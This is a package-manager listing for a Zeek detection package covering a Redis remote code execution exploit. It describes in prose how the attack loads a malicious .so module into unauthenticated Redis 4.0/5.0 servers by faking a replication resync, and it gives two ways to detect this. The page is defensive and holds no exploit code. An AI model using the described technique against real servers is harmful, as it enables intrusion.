Zeek Package Manager
 

redis-rce

https://github.com/zeek/redis-rce
0
0
0
0
Last Push 4/14/26, 2:01 PM

Redis RCE Detection

This is a detection for a simple Redis remote code execution (RCE).

Usage

Install this package with zkg:

$ zkg install redis-rce

Then, execute Zeek with the scripts:

$ zeek redis-rce/export/whitelist-commands -r tests/Traces/exploit.pcap
$ zeek redis-rce/export/elf-transfer -r tests/Traces/exploit.pcap

Both should produce notice.log for the exploit.

The exploit

In Redis, you can load commands from a .so file. The example here uses a library file from this repo. Loading this with Redis gives the user more commands to execute.

In some unauthenticated instances of Redis, a malicious actor may inject this library file into a server by acting like it's a database resync. You can see how that is done here.

The detection

There are multiple ways to detect this.

The most obvious is to detect the ELF file transfer. This only happens if the malicious actor was able to get all the way to a database resync. It is also a transfer to a replica instance, which is technically not the same Redis RESP protocol specification. This makes the detection relatively unstable.

You may also simply whitelist commands that clients are able to do, then trigger a notice for any that are not whitelisted. This is the preferred method, as it may also catch attempts that fail for various reasons.

Package Version :

Description :

This detects a particular RCE exploit with Redis replication logic in
redis 4.0 and 5.0.

Script Dir :

scripts

Test Command :

cd tests && btest -c btest.cfg

Depends :

zeek >=8.0.0

Package Checks :

License:
Info:
Found license 'COPYING'
Readme:
Info:
Found readme 'README.md'
Build Command:
Bad Extension:
Expensive Events:
Unsafe Functions:
Charset: